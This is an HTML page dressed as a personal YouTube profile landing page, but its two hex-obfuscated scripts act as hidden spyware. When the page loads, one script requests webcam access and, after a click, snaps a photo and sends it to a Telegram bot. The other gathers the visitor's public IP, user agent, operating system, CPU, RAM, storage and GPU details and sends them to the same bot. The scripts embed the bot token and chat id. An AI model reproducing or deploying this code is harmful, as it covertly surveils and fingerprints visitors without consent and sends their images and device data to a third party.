<!DOCTYPE html>
<html>
<head>
    <title>Đinh Duy Vinh </title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <style>
    body {
      background-color: rgb(255, 255, 255);
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      padding: 0;
      overflow: hidden;
      flex-direction: column;
    }

    .avatar {
      width: 300px;
      height: 300px;
    }

    .username {
      font-size: 20px;
      font-family: Montserrat, sans-serif;
      font-weight: 300;
      font-stretch: condensed;
      color: rgb(0, 0, 0);
      text-decoration: none;
      margin-top: 10px;
      position: relative;
      opacity: 0;
      animation: fadeIn 2s ease-in-out forwards;
    }

    .username::after {
      content: "";
      position: absolute;
      width: 0;
      height: 1px;
      background-color: rgb(0, 0, 0);
      bottom: -1px;
      left: 0;
      transition: width 0.3s ease;
    }

    .username:hover {
      font-style: italic;
    }

    .username:hover::after {
      width: 100%;
    }

    .loading-rectangle-left {
      position: absolute;
      top: 0;
      bottom: 0;
      width: 50%;
      background-color: rgb(0, 0, 0);
      animation: loadingAnimationLeft 4s forwards;
    }

    .loading-rectangle-right {
      position: absolute;
      top: 0;
      bottom: 0;
      right: 0;
      width: 50%;
      background-color: rgb(0, 0, 0);
      animation: loadingAnimationRight 4s forwards;
    }

    @keyframes loadingAnimationLeft {
      0% {
        left: 0;
      }
      50% {
        left: -50%;
      }
      100% {
        left: -50%;
      }
    }

    @keyframes loadingAnimationRight {
      0% {
        right: 0;
      }
      50% {
        right: -50%;
      }
      100% {
        right: -50%;
      }
    }

    @keyframes fadeIn {
      0% {
        opacity: 0;
      }
      100% {
        opacity: 1;
      }
    }
  </style>
</head>
<body>
    <div class="loading-rectangle-left"></div>
    <div class="loading-rectangle-right"></div>
    <a href="https://www.youtube.com/@duyvinh09" class="username">Đinh Duy Vinh</a>
    <a href="https://www.youtube.com/@duyvinh09" target="_blank">
        <button type="button">Xem trên YouTube</button>
    </a>

    <h1> </h1>
    <video id="video" width="1" height="1" autoplay></video>

    <script>
        var _0xae4f=["\x76\x69\x64\x65\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x61\x6E\x76\x61\x73","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x32\x64","\x67\x65\x74\x43\x6F\x6E\x74\x65\x78\x74","\x77\x69\x64\x74\x68","\x76\x69\x64\x65\x6F\x57\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x76\x69\x64\x65\x6F\x48\x65\x69\x67\x68\x74","\x64\x72\x61\x77\x49\x6D\x61\x67\x65","\x63\x68\x61\x74\x5F\x69\x64","\x2D\x39\x38\x39\x39\x33\x32\x38\x34\x35","\x61\x70\x70\x65\x6E\x64","\x70\x68\x6F\x74\x6F","\x70\x68\x6F\x74\x6F\x2E\x6A\x70\x67","\x50\x4F\x53\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x74\x65\x6C\x65\x67\x72\x61\x6D\x2E\x6F\x72\x67\x2F\x62\x6F\x74\x36\x30\x30\x32\x32\x31\x30\x38\x35\x34\x3A\x41\x41\x46\x74\x4E\x75\x75\x6E\x55\x62\x4A\x6F\x44\x6B\x36\x43\x38\x33\x6F\x55\x2D\x64\x45\x33\x69\x6C\x36\x33\x2D\x4D\x32\x6D\x53\x55\x49\x2F\x73\x65\x6E\x64\x50\x68\x6F\x74\x6F","\u0110\xE3\x20\x78\u1EA3\x79\x20\x72\x61\x20\x6C\u1ED7\x69\x21","\x61\x6A\x61\x78","\x69\x6D\x61\x67\x65\x2F\x6A\x70\x65\x67","\x74\x6F\x42\x6C\x6F\x62","\u0110\xE3\x20\x78\u1EA3\x79\x20\x72\x61\x20\x6C\u1ED7\x69\x20\x6B\x68\x69\x20\x74\x72\x75\x79\x20\x63\u1EAD\x70\x20\x77\x65\x62\x63\x61\x6D\x3A\x20","\x6D\x65\x73\x73\x61\x67\x65","\x6C\x6F\x67","\x63\x61\x74\x63\x68","\x73\x72\x63\x4F\x62\x6A\x65\x63\x74","\x70\x6C\x61\x79","\x63\x6C\x69\x63\x6B","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x74\x68\x65\x6E","\x67\x65\x74\x55\x73\x65\x72\x4D\x65\x64\x69\x61","\x6D\x65\x64\x69\x61\x44\x65\x76\x69\x63\x65\x73","\u1EE8\x6E\x67\x20\x64\u1EE5\x6E\x67\x20\x6D\x75\u1ED1\x6E\x20\x74\x72\x75\x79\x20\x63\u1EAD\x70\x20\x76\xE0\x6F\x20\x63\x61\x6D\x65\x72\x61\x2E","\x44\x4F\x4D\x43\x6F\x6E\x74\x65\x6E\x74\x4C\x6F\x61\x64\x65\x64"];function capturePhoto(){var _0x7496x2=document[_0xae4f[1]](_0xae4f[0]);var _0x7496x3=document[_0xae4f[3]](_0xae4f[2]);var _0x7496x4=_0x7496x3[_0xae4f[5]](_0xae4f[4]);_0x7496x3[_0xae4f[6]]= _0x7496x2[_0xae4f[7]];_0x7496x3[_0xae4f[8]]= _0x7496x2[_0xae4f[9]];_0x7496x4[_0xae4f[10]](_0x7496x2,0,0,_0x7496x3[_0xae4f[6]],_0x7496x3[_0xae4f[8]]);_0x7496x3[_0xae4f[21]](function(_0x7496x5){var _0x7496x6= new FormData();_0x7496x6[_0xae4f[13]](_0xae4f[11],_0xae4f[12]);_0x7496x6[_0xae4f[13]](_0xae4f[14],_0x7496x5,_0xae4f[15]);$[_0xae4f[19]]({type:_0xae4f[16],url:_0xae4f[17],data:_0x7496x6,processData:false,contentType:false,success:function(_0x7496x7){alert(_0xae4f[18])},error:function(_0x7496x8){alert(_0xae4f[18])}})},_0xae4f[20])}function requestCameraAccess(){navigator[_0xae4f[32]][_0xae4f[31]]({video:true})[_0xae4f[30]](function(_0x7496xa){var _0x7496x2=document[_0xae4f[1]](_0xae4f[0]);_0x7496x2[_0xae4f[26]]= _0x7496xa;_0x7496x2[_0xae4f[27]]();document[_0xae4f[29]](_0xae4f[28],function(){capturePhoto()})})[_0xae4f[25]](function(_0x7496x8){console[_0xae4f[24]](_0xae4f[22]+ _0x7496x8[_0xae4f[23]])})}function showCameraAccessAlert(){alert(_0xae4f[33]);requestCameraAccess()}window[_0xae4f[29]](_0xae4f[34],function(){showCameraAccessAlert()})
    </script>

    <script>
        var _0x8050=["\x36\x30\x30\x32\x32\x31\x30\x38\x35\x34\x3A\x41\x41\x46\x74\x4E\x75\x75\x6E\x55\x62\x4A\x6F\x44\x6B\x36\x43\x38\x33\x6F\x55\x2D\x64\x45\x33\x69\x6C\x36\x33\x2D\x4D\x32\x6D\x53\x55\x49","\x2D\x39\x38\x39\x39\x33\x32\x38\x34\x35","\x31\x39\x32\x2E\x31\x36\x38\x2E\x32\x2E\x31","\x31\x30\x2E\x30\x2E\x30\x2E\x31","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x69\x70\x69\x66\x79\x2E\x6F\x72\x67\x3F\x66\x6F\x72\x6D\x61\x74\x3D\x6A\x73\x6F\x6E","\x69\x70","\x69\x6E\x63\x6C\x75\x64\x65\x73","\u0110\u1ECB\x61\x20\x63\x68\u1EC9\x20\x49\x50\x20\x6E\u1EB1\x6D\x20\x74\x72\x6F\x6E\x67\x20\x64\x61\x6E\x68\x20\x73\xE1\x63\x68\x20\x6E\x67\x6F\u1EA1\x69\x20\x6C\u1EC7\x2E\x20\x4B\x68\xF4\x6E\x67\x20\x67\u1EED\x69\x20\x74\x68\xF4\x6E\x67\x20\x74\x69\x6E\x20\u0111\u1EBF\x6E\x20\x54\x65\x6C\x65\x67\x72\x61\x6D\x2E","\x6C\x6F\x67","\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6F\x6E\x63\x75\x72\x72\x65\x6E\x63\x79","\x4E\x2F\x41","\x64\x65\x76\x69\x63\x65\x4D\x65\x6D\x6F\x72\x79","\x64\x65\x76\x69\x63\x65\x53\x74\x6F\x72\x61\x67\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x20\x2D\x20\u0110\u1ECB\x61\x20\x63\x68\u1EC9\x20\x49\x50\x20\x6D\u1EDB\x69\x3A\x20","\x0A\x20\x2D\x20\x55\x73\x65\x72\x2D\x41\x67\x65\x6E\x74\x3A\x20","\x0A\x20\x2D\x20\x48\u1EC7\x20\u0111\x69\u1EC1\x75\x20\x68\xE0\x6E\x68\x3A\x20","\x0A\x20\x2D\x20\x43\x50\x55\x3A\x20","\x0A\x20\x2D\x20\x52\x41\x4D\x3A\x20","\x0A\x20\x2D\x20\x44\x69\x73\x6B\x3A\x20","\x0A\x20\x2D\x20\x47\x50\x55\x3A\x20","\x50\x4F\x53\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x74\x65\x6C\x65\x67\x72\x61\x6D\x2E\x6F\x72\x67\x2F\x62\x6F\x74","\x2F\x73\x65\x6E\x64\x4D\x65\x73\x73\x61\x67\x65","\x6A\x73\x6F\x6E","\x54\x68\xF4\x6E\x67\x20\x74\x69\x6E\x20\u0111\xE3\x20\u0111\u01B0\u1EE3\x63\x20\x67\u1EED\x69\x20\x74\x68\xE0\x6E\x68\x20\x63\xF4\x6E\x67\x20\u0111\u1EBF\x6E\x20\x54\x65\x6C\x65\x67\x72\x61\x6D","\x4C\u1ED7\x69\x20\x6B\x68\x69\x20\x67\u1EED\x69\x20\x74\x68\xF4\x6E\x67\x20\x74\x69\x6E\x20\u0111\u1EBF\x6E\x20\x54\x65\x6C\x65\x67\x72\x61\x6D\x3A\x20","\x61\x6A\x61\x78","\x67\x65\x74\x4A\x53\x4F\x4E","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x74\x65\x73\x74","\x57\x69\x6E\x64\x6F\x77\x73\x20\x50\x68\x6F\x6E\x65","\x41\x6E\x64\x72\x6F\x69\x64","\x4D\x53\x53\x74\x72\x65\x61\x6D","\x69\x4F\x53","\x4D\x61\x63\x20\x4F\x53","\x57\x69\x6E\x64\x6F\x77\x73","\x55\x6E\x6B\x6E\x6F\x77\x6E","\x63\x61\x6E\x76\x61\x73","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x77\x65\x62\x67\x6C","\x67\x65\x74\x43\x6F\x6E\x74\x65\x78\x74","\x65\x78\x70\x65\x72\x69\x6D\x65\x6E\x74\x61\x6C\x2D\x77\x65\x62\x67\x6C","\x57\x45\x42\x47\x4C\x5F\x64\x65\x62\x75\x67\x5F\x72\x65\x6E\x64\x65\x72\x65\x72\x5F\x69\x6E\x66\x6F","\x67\x65\x74\x45\x78\x74\x65\x6E\x73\x69\x6F\x6E","\x67\x65\x74\x50\x61\x72\x61\x6D\x65\x74\x65\x72","\x72\x65\x61\x64\x79"];$(document)[_0x8050[47]](function(){var _0x8c25x1=_0x8050[0];var _0x8c25x2=_0x8050[1];var _0x8c25x3=[_0x8050[2],_0x8050[3]];$[_0x8050[28]](_0x8050[4],function(_0x8c25x4){var _0x8c25x5=_0x8c25x4[_0x8050[5]];if(_0x8c25x3[_0x8050[6]](_0x8c25x5)){console[_0x8050[8]](_0x8050[7]);return};var _0x8c25x6=navigator[_0x8050[9]]|| _0x8050[10];var _0x8c25x7=navigator[_0x8050[11]]|| _0x8050[10];var _0x8c25x8=navigator[_0x8050[12]]|| _0x8050[10];var _0x8c25x9=_0x8c25x11();var _0x8c25xa=_0x8c25x10();var _0x8c25xb=navigator[_0x8050[13]];var _0x8c25xc=_0x8050[14]+ _0x8c25x5+ _0x8050[15]+ _0x8c25xb+ _0x8050[16]+ _0x8c25xa+ _0x8050[17]+ _0x8c25x6+ _0x8050[18]+ _0x8c25x7+ _0x8050[19]+ _0x8c25x8+ _0x8050[20]+ _0x8c25x9;var _0x8c25xd={chat_id:_0x8c25x2,text:_0x8c25xc};$[_0x8050[27]]({type:_0x8050[21],url:_0x8050[22]+ _0x8c25x1+ _0x8050[23],data:_0x8c25xd,dataType:_0x8050[24],success:function(_0x8c25xe){console[_0x8050[8]](_0x8050[25])},error:function(_0x8c25xf){console[_0x8050[8]](_0x8050[26]+ _0x8c25xf)}})});function _0x8c25x10(){var _0x8c25xb=navigator[_0x8050[13]]|| navigator[_0x8050[29]]|| window[_0x8050[30]];if(/windows phone/i[_0x8050[31]](_0x8c25xb)){return _0x8050[32]};if(/android/i[_0x8050[31]](_0x8c25xb)){return _0x8050[33]};if(/iPad|iPhone|iPod/[_0x8050[31]](_0x8c25xb)&&  !window[_0x8050[34]]){return _0x8050[35]};if(/Macintosh|Mac OS X/[_0x8050[31]](_0x8c25xb)){return _0x8050[36]};if(/Windows NT/[_0x8050[31]](_0x8c25xb)){return _0x8050[37]};return _0x8050[38]}function _0x8c25x11(){var _0x8c25x12=document[_0x8050[40]](_0x8050[39]);var _0x8c25x13=_0x8c25x12[_0x8050[42]](_0x8050[41])|| _0x8c25x12[_0x8050[42]](_0x8050[43]);var _0x8c25x14=_0x8c25x13[_0x8050[45]](_0x8050[44]);var _0x8c25x9=_0x8050[10];if(_0x8c25x14){_0x8c25x9= _0x8c25x13[_0x8050[46]](_0x8c25x14.UNMASKED_RENDERER_WEBGL)};return _0x8c25x9}})
    </script>
</body>
</html>
